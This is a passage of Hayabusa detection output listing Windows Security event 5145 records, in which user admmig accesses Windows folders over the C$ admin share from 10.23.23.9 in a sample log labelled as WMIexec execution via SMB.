execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 